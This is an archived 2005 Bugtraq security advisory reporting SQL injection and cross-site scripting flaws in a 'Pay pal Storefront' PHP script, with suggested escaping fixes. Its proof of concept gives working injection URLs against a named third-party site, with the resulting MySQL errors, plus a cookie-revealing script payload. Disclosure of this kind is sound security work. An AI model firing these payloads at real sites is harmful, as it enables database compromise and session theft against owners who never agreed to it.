lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <001601c53553$11733dd0$736510ac@rootinc>
Date: Wed, 30 Mar 2005 23:35:31 +0530
From: "Diabolic Crab" <dcrab@...kerscenter.com>
To: "securityfocus" <bugtraq@...urityfocus.com>
Subject: Multiple sql injection, and xss vulnerabilities in Pay pal Storefront


  Dcrab 's Security Advisory
 http://icis.digitalparadox.org/~dcrab
 http://www.hackerscenter.com/

 Severity:  High
 Title: Multiple sql injection, and xss vulnerabilities in Pay pal 
Storefront
 Date: March  25,  2005

 Summary:
 There are multiple sql injection, xss vulnerabilities in the Pay pal 
Storefront script.

 Proof of Concept Exploits:

 http://www.esmistudio.com/hv/ecdis/pages.php?idpages='SQL INJECTION
 You have an error in your SQL syntax. Check the manual that corresponds to 
your MySQL server version for the right syntax to use near '\'SQL INJECTION' 
at line 1

 http://www.esmistudio.com/hv/ecdis/products1.php?id=6&id2='SQL 
INJECTION&subcat=Asus&p=products1
 You have an error in your SQL syntax. Check the manual that corresponds to 
your MySQL server version for the right syntax to use near '\'SQL INJECTION 
ORDER BY title ASC LIMIT 0, 9' at line 1

 http://www.esmistudio.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 This shows the cookie data. Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(),mysql_real_escape_string() and other functions for input validation beforepassing user input to the mysql database, or before echoing data on thescreen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, Email:dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact meregarding these vulnerabilities. You can find me at,http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab.Lookout for my soon to come out book on Secure coding with php.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ